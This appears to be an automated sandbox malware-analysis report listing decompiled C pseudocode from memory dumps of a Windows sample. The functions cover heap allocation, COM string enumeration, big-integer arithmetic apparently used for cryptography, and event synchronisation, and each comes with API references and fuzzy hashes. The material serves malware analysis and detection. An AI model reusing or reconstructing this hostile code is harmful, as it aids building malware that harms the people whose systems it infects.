Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: 34528736684f8dd87064123fcbba3785f4c56e8a6071b4a2778ea6de98dfd9bd
Instruction ID: 43e9ead2d32b1cec9f76be9d87b7210779436f13ab6c4a5d2a3a5d8209db853b
Opcode Fuzzy Hash: 34528736684f8dd87064123fcbba3785f4c56e8a6071b4a2778ea6de98dfd9bd
Instruction Fuzzy Hash: 04F05E79E862019FEB188F64DA69F9537B4FB55380B04485AE542D7350F330E820CA14

Uniqueness

Uniqueness Score: -1.00%

Function 02BD121A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E02BD121A(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t63;
				intOrPtr* _t64;
				char* _t65;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t63 = __esi + 0x2c;
				_v16 = 0;
				 *_t63 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0);
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t63);
				_t64 = __imp__; // 0x6fb0fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t64() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E02BD75F6(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t64() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t65 = E02BD75F6(_v8 + 1);
							if(_t65 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t65, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t65;
							}
						}
						E02BD4AAB(_v20);
					}
					goto L12;
				}
			}

0x02bd1220
0x02bd1227
0x02bd122a
0x02bd122d
0x02bd122f
0x02bd1234
0x02bd1317
0x02bd131d
0x02bd131d
0x02bd123e
0x02bd1245
0x02bd124d
0x02bd130e
0x02bd1314
0x00000000
0x02bd1314
0x02bd1256
0x02bd125a
0x02bd125b
0x02bd125c
0x02bd1262
0x02bd1263
0x02bd1268
0x02bd126f
0x00000000
0x02bd1275
0x02bd1284
0x02bd1287
0x02bd128a
0x02bd1293
0x02bd1298
0x02bd129d
0x02bd1305
0x02bd129f
0x02bd12a2
0x02bd12a6
0x02bd12a7
0x02bd12a8
0x02bd12a9
0x02bd12ab
0x02bd12b2
0x02bd12f8
0x02bd12b4
0x02bd12b4
0x02bd12bf
0x02bd12cd
0x02bd12d1
0x02bd12e9
0x02bd12d3
0x02bd12dc
0x02bd12e4
0x02bd12e4
0x02bd12d1
0x02bd12fe
0x02bd12fe
0x00000000
0x02bd129d

APIs

GetLastError.KERNEL32 ref: 02BD130E

Part of subcall function 02BD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,02BD4F70), ref: 02BD7602

wcstombs.NTDLL ref: 02BD12DC
GetLastError.KERNEL32 ref: 02BD12F2

Strings

@MtNt, xrefs: 02BD12F2, 02BD130E

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AllocateHeapwcstombs
String ID: @MtNt
API String ID: 2631933831-3251738875
Opcode ID: fe1e88991e11b3d2815d8ccfe527d5ed3180704473bd2f928eb8b3390888e52e
Instruction ID: 51fa84e96da2da70874ccf7bf7b11f45231eb190986f9f74058d9cc70bbdddc4
Opcode Fuzzy Hash: fe1e88991e11b3d2815d8ccfe527d5ed3180704473bd2f928eb8b3390888e52e
Instruction Fuzzy Hash: 0031F9B5900208FFDB10DFA9C880AEEBBB9FB08344F5085A9E546E3251E7319A44DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02BD577D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E02BD577D(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x2bdd380; // 0x6749b00
				_push(0x800);
				_push(0);
				_push( *0x2bdd270);
				if( *0x2bdd284 >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x2bdd284 =  *0x2bdd284 + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E02BD789B(_t44, _t40);
						_t18 = E02BD3720(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x2bdd284 < 5) {
								 *0x2bdd284 =  *0x2bdd284 & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E02BD47D5();
						HeapFree( *0x2bdd270, 0, _t40);
						goto L10;
					}
					_t24 = E02BD44A4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E02BD6109(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}

0x02bd577d
0x02bd577d
0x02bd5780
0x02bd5781
0x02bd578b
0x02bd5792
0x02bd5797
0x02bd5799
0x02bd579f
0x02bd57c7
0x02bd57df
0x02bd57e1
0x02bd57e2
0x02bd57e4
0x02bd5822
0x02bd5822
0x02bd5828
0x02bd582e
0x02bd582e
0x02bd57e6
0x02bd57ec
0x02bd57ef
0x02bd57fe
0x02bd5800
0x02bd5807
0x02bd583b
0x02bd5840
0x02bd5842
0x02bd5844
0x02bd5844
0x00000000
0x02bd5842
0x02bd5809
0x02bd580e
0x02bd581c
0x00000000
0x02bd581c
0x02bd57d6
0x02bd57db
0x02bd57db
0x00000000
0x02bd57db
0x02bd57a9
0x00000000
0x00000000
0x02bd57b8
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 02BD57A1

Part of subcall function 02BD6109: GetTickCount.KERNEL32 ref: 02BD611D
Part of subcall function 02BD6109: wsprintfA.USER32 ref: 02BD616D
Part of subcall function 02BD6109: wsprintfA.USER32 ref: 02BD618A
Part of subcall function 02BD6109: wsprintfA.USER32 ref: 02BD61B6
Part of subcall function 02BD6109: HeapFree.KERNEL32(00000000,?), ref: 02BD61C8
Part of subcall function 02BD6109: wsprintfA.USER32 ref: 02BD61E9
Part of subcall function 02BD6109: HeapFree.KERNEL32(00000000,?), ref: 02BD61F9
Part of subcall function 02BD6109: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD6227
Part of subcall function 02BD6109: GetTickCount.KERNEL32 ref: 02BD6238

RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 02BD57BF
HeapFree.KERNEL32(00000000,00000002,02BD553A,?,02BD553A,00000002,?,?,02BD53C9,?), ref: 02BD581C

Strings

Ut, xrefs: 02BD581C

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID: Ut
API String ID: 1676223858-8415677
Opcode ID: c379c48821d3f62de3e5d2bf7bbf9f3a288ad18d814fe46dd728a3fb1c66a30c
Instruction ID: 87534d7696b74699c7986482997162e0a0e32f55de20de70bf41e5e224667f03
Opcode Fuzzy Hash: c379c48821d3f62de3e5d2bf7bbf9f3a288ad18d814fe46dd728a3fb1c66a30c
Instruction Fuzzy Hash: 30217F7264220AEBCB219F54D894FDA3BBDEB08394F600466F942D7140FB70E915DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BD3273, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 02BD32AE
SysFreeString.OLEAUT32(00000000), ref: 02BD3393

Part of subcall function 02BD5920: SysAllocString.OLEAUT32(02BDC2B0), ref: 02BD5970

SafeArrayDestroy.OLEAUT32(00000000), ref: 02BD33E6
SysFreeString.OLEAUT32(00000000), ref: 02BD33F5

Part of subcall function 02BD3D39: Sleep.KERNEL32(000001F4), ref: 02BD3D81

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: b4a1dc4b80e8c88e61036e4f2a3fca2ae21b7d9809be7deefd7fa90bfb4d91a9
Instruction ID: b60f6a4082359361da37c2ecbbfa0653efa45ba915367a8f419c8cbeec9f1ddf
Opcode Fuzzy Hash: b4a1dc4b80e8c88e61036e4f2a3fca2ae21b7d9809be7deefd7fa90bfb4d91a9
Instruction Fuzzy Hash: 8A516D36500609AFDB01CFA8C844ADEB7B6FF88754B1488A9E509DB211EB71ED06CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02BD5920, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E02BD5920(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x2bdd2e0; // 0x3b6a5a8
					_t5 = _t103 + 0x2bde038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x2bdc2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x2bdd2e0; // 0x3b6a5a8
												_t28 = _t109 + 0x2bde0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x2bdd2e0; // 0x3b6a5a8
														_t33 = _t79 + 0x2bde078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x02bd5925
0x02bd592e
0x02bd592f
0x02bd5933
0x02bd5939
0x02bd593f
0x02bd5948
0x02bd594e
0x02bd5958
0x02bd595a
0x02bd5960
0x02bd5965
0x02bd5970
0x02bd5976
0x02bd597b
0x02bd5a9d
0x02bd5981
0x02bd5981
0x02bd598e
0x02bd5994
0x02bd599a
0x02bd599e
0x02bd59a4
0x02bd59b1
0x02bd59b5
0x02bd59bb
0x02bd59be
0x02bd59c6
0x02bd59c7
0x02bd59cb
0x02bd59cf
0x02bd59d2
0x02bd59d5
0x02bd59db
0x02bd59e4
0x02bd59ea
0x02bd59eb
0x02bd59ee
0x02bd59ef
0x02bd59f0
0x02bd59f8
0x02bd59f9
0x02bd59fa
0x02bd59fc
0x02bd5a00
0x02bd5a04
0x00000000
0x00000000
0x02bd5a0a
0x02bd5a13
0x02bd5a19
0x02bd5a23
0x02bd5a27
0x02bd5a29
0x02bd5a36
0x02bd5a3a
0x02bd5a42
0x02bd5a47
0x02bd5a59
0x02bd5a5b
0x02bd5a61
0x02bd5a61
0x02bd5a6a
0x02bd5a6a
0x02bd5a6c
0x02bd5a72
0x02bd5a72
0x02bd5a75
0x02bd5a7b
0x02bd5a7e
0x02bd5a87
0x00000000
0x00000000
0x00000000
0x02bd5a87
0x02bd59db
0x02bd59d5
0x02bd59be
0x02bd5a8d
0x02bd5a8d
0x02bd5a93
0x02bd5a93
0x02bd5a99
0x02bd5a99
0x02bd5aa2
0x02bd5aa8
0x02bd5aa8
0x02bd5965
0x02bd5ab1

APIs

SysAllocString.OLEAUT32(02BDC2B0), ref: 02BD5970
lstrcmpW.KERNEL32(00000000,0076006F), ref: 02BD5A51
SysFreeString.OLEAUT32(00000000), ref: 02BD5A6A
SysFreeString.OLEAUT32(?), ref: 02BD5A99

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 088135794a124357cd8244f902917df80fac52681e1426e06198a1e1d88924db
Instruction ID: e40555de312164ce48431719ce6d09a3f7ba6de885e8dc2045d565f4ac730e58
Opcode Fuzzy Hash: 088135794a124357cd8244f902917df80fac52681e1426e06198a1e1d88924db
Instruction Fuzzy Hash: 3B515075D00519EFCB10DFA8C4889EEB7B6FF88704B144599E915EB210E731AD45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BD7B30, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02BD7B30(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02BD47C4(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02BD227C(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E02BD3C06(_t101,  &_v428, _a8, _t96 - _t81);
					E02BD3C06(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E02BD227C(_t101, 0x2bdd168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E02BD227C(_a16, _a4);
						E02BD3450(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02BDAED0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02BDAECA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E02BD2420(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E02BD3F60(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02BD2775(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x2bdd168 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x02bd7b33
0x02bd7b3f
0x02bd7b45
0x02bd7b4a
0x02bd7b4e
0x02bd7cc0
0x02bd7cc4
0x02bd7cc4
0x02bd7b54
0x02bd7b58
0x02bd7b5c
0x02bd7b5f
0x02bd7b6a
0x02bd7b70
0x02bd7b75
0x02bd7b78
0x02bd7b92
0x02bd7ba1
0x02bd7bad
0x02bd7bb7
0x02bd7bbc
0x02bd7bbe
0x02bd7bc1
0x02bd7c78
0x02bd7c7e
0x02bd7c8f
0x02bd7ca2
0x02bd7cb8
0x00000000
0x02bd7cbd
0x02bd7bca
0x02bd7bd1
0x02bd7bd5
0x02bd7bdb
0x02bd7bdd
0x02bd7bdf
0x02bd7be1
0x02bd7be3
0x02bd7bed
0x02bd7bf2
0x02bd7bf4
0x02bd7bf6
0x02bd7bf7
0x02bd7bf8
0x02bd7bf9
0x02bd7c00
0x02bd7c07
0x02bd7c0a
0x02bd7c0a
0x02bd7bd7
0x02bd7bd7
0x02bd7bd7
0x02bd7c12
0x02bd7c1a
0x02bd7c26
0x02bd7c2b
0x02bd7c2b
0x02bd7c30
0x00000000
0x00000000
0x02bd7c32
0x02bd7c35
0x02bd7c42
0x00000000
0x00000000
0x02bd7c44
0x02bd7c44
0x02bd7c51
0x02bd7c2b
0x02bd7c30
0x00000000
0x00000000
0x00000000
0x02bd7c30
0x02bd7c5b
0x02bd7c5e
0x02bd7c61
0x02bd7c68
0x02bd7c68
0x02bd7c75
0x00000000
0x02bd7c75
0x02bd7b61
0x02bd7b65
0x02bd7b66
0x02bd7b68
0x00000000
0x00000000
0x00000000
0x02bd7b68
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 02BD7BE3
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02BD7BF9
memset.NTDLL ref: 02BD7CA2
memset.NTDLL ref: 02BD7CB8

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: a00a205e55ed3f14897eba02a84e3da62a81e34a19a3b0f0008772d26f4f4562
Instruction ID: 0ba5cd42e56f88dcc0526038c1845a94e9c0a28f7230fd5cb4f42a701311cef8
Opcode Fuzzy Hash: a00a205e55ed3f14897eba02a84e3da62a81e34a19a3b0f0008772d26f4f4562
Instruction Fuzzy Hash: 7D418171A00219AFDB10AF68CC40BDEB7B6EF45310F1445A9B949A7281FB70AA54CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02BD3DA0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 02BD3DFD
SysAllocString.OLEAUT32(02BD28D9), ref: 02BD3E41
SysFreeString.OLEAUT32(00000000), ref: 02BD3E55
SysFreeString.OLEAUT32(00000000), ref: 02BD3E63

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: c22b22568f8dfc8a580893e28db204ad8b8f414afd49cd7f8dbeda68211ac7ca
Instruction ID: 0145be824409bcf8433da7f9bb2be4b2eb8f98bee595892984435799219f9e05
Opcode Fuzzy Hash: c22b22568f8dfc8a580893e28db204ad8b8f414afd49cd7f8dbeda68211ac7ca
Instruction Fuzzy Hash: 5F310E76900209EFCB05DFA8D8909EE7BB5FF48340B1188AEF505D7291E7719A81CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02BD7CC7, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E02BD7CC7(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x2bdd2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x2bdd2e0; // 0x3b6a5a8
				_t3 = _t8 + 0x2bde876; // 0x61636f4c
				_t25 = 0;
				_t30 = E02BD3CC2(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x2bdd2e4, 1, 0, _t30);
					E02BD4AAB(_t30);
				}
				_t12 =  *0x2bdd294; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02BD4A03() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E02BD1000(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x2bdd108( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E02BD5AB2(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x02bd7cc8
0x02bd7ccf
0x02bd7cd9
0x02bd7cdd
0x02bd7ce3
0x02bd7cf2
0x02bd7cf9
0x02bd7cfd
0x02bd7d0f
0x02bd7d11
0x02bd7d11
0x02bd7d16
0x02bd7d1d
0x02bd7d74
0x02bd7d74
0x02bd7d7a
0x02bd7d7c
0x02bd7d7c
0x02bd7d86
0x02bd7d8a
0x02bd7d9c
0x02bd7d9c
0x02bd7da0
0x02bd7da6
0x02bd7da6
0x00000000
0x02bd7d36
0x02bd7d3b
0x02bd7d43
0x02bd7d47
0x02bd7d4b
0x02bd7d4b
0x02bd7d58
0x02bd7d5c
0x02bd7d60
0x02bd7db5
0x02bd7dbb
0x02bd7dbb
0x02bd7d6e
0x02bd7d72
0x02bd7da9
0x02bd7dab
0x02bd7dae
0x02bd7dae
0x00000000
0x02bd7dab
0x02bd7d72
0x00000000
0x02bd7d5c

APIs

Part of subcall function 02BD3CC2: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,06749B10,00000000,?,?,69B25F44,00000005,02BDD00C,?,?,02BD539B), ref: 02BD3CF8
Part of subcall function 02BD3CC2: lstrcpy.KERNEL32(00000000,00000000), ref: 02BD3D1C
Part of subcall function 02BD3CC2: lstrcat.KERNEL32(00000000,00000000), ref: 02BD3D24

CreateEventA.KERNEL32(02BDD2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02BD21B6,?,00000001,?), ref: 02BD7D08

Part of subcall function 02BD4AAB: HeapFree.KERNEL32(00000000,00000000,02BD5012,00000000,?,?,00000000), ref: 02BD4AB7

WaitForSingleObject.KERNEL32(00000000,00004E20,02BD21B6,00000000,00000000,?,00000000,?,02BD21B6,?,00000001,?,?,?,?,02BD555B), ref: 02BD7D68
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,02BD21B6,?,00000001,?), ref: 02BD7D96
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02BD21B6,?,00000001,?,?,?,?,02BD555B), ref: 02BD7DAE

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: f39dedffdec56c54dbeaad8017c6185de75db33348ed9ae2c49fd0dedc755c28
Instruction ID: 317f4f8db2bd7a78cdb8d926fbeb3a1c3929853b0a37ab572543a7db2caeb14f
